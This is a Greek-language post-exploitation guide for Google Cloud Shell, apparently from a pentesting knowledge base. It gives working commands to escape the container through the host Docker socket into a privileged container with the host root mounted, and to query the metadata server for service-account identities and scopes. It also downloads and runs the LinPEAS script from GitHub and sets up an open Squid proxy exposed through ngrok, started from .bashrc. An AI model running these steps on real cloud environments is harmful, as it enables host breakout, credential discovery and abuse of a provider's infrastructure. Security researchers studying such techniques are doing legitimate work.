GCP - Cloud Shell Post Exploitation

Cloud Shell

Για περισσότερες πληροφορίες σχετικά με το Cloud Shell, ελέγξτε:

Απόδραση από τον επικάλυμμα εμπορευμάτων

Σημειώστε ότι το Google Cloud Shell τρέχει μέσα σε ένα εμπορευματοκιβώτιο, μπορείτε εύκολα να δραπετεύσετε στον κεντρικό υπολογιστή κάνοντας:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Αυτό δεν θεωρείται ευπάθεια από την Google, αλλά σας δίνει μια ευρύτερη εικόνα του τι συμβαίνει σε αυτό το περιβάλλον.

Επιπλέον, παρατηρήστε ότι από τον υπολογιστή μπορείτε να βρείτε ένα τεκμήριο λογαριασμού υπηρεσίας:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Με τις παρακάτω εμβέλειες:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Απαριθμήστε τα μεταδεδομένα με το LinPEAS:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Μετά τη χρήση του https://github.com/carlospolop/bf_my_gcp_permissions με το token του Service Account δεν ανακαλύφθηκαν δικαιώματα...

Χρήση ως Proxy

Εάν θέλετε να χρησιμοποιήσετε την προσωπική σας cloud shell instance ως proxy, πρέπει να εκτελέσετε τις παρακάτω εντολές (ή να τις εισάγετε στο αρχείο .bashrc):

sudo apt install -y squid

Απλά για να το γνωρίζετε, το Squid είναι ένας διακομιστής http προξενητής. Δημιουργήστε ένα αρχείο squid.conf με τις παρακάτω ρυθμίσεις:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

αντιγράψτε το αρχείο squid.conf στο /etc/squid

sudo cp squid.conf /etc/squid

Τέλος, εκτελέστε την υπηρεσία squid:

sudo service squid start

Χρησιμοποιήστε το ngrok για να επιτρέψετε στον διακομιστή proxy να είναι διαθέσιμος από το εξωτερικό:

./ngrok tcp 3128

Μετά την εκτέλεση, αντιγράψτε το URL tcp://. Εάν θέλετε να εκτελέσετε τον διαμεσολαβητή από έναν περιηγητή, συνιστάται να αφαιρέσετε το μέρος tcp:// και τη θύρα και να τοποθετήσετε τη θύρα στο πεδίο θύρας των ρυθμίσεων διαμεσολαβητή του περιηγητή σας (ο squid είναι ένας διαμεσολαβητής http).

Για καλύτερη χρήση κατά την εκκίνηση, το αρχείο .bashrc θα πρέπει να έχει τις παρακάτω γραμμές:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Οι οδηγίες αντιγράφηκαν από https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Ελέγξτε αυτήν τη σελίδα για άλλες παράλογες ιδέες για να εκτελέσετε οποιοδήποτε είδος λογισμικού (βάσεις δεδομένων και ακόμα και Windows) στο Cloud Shell.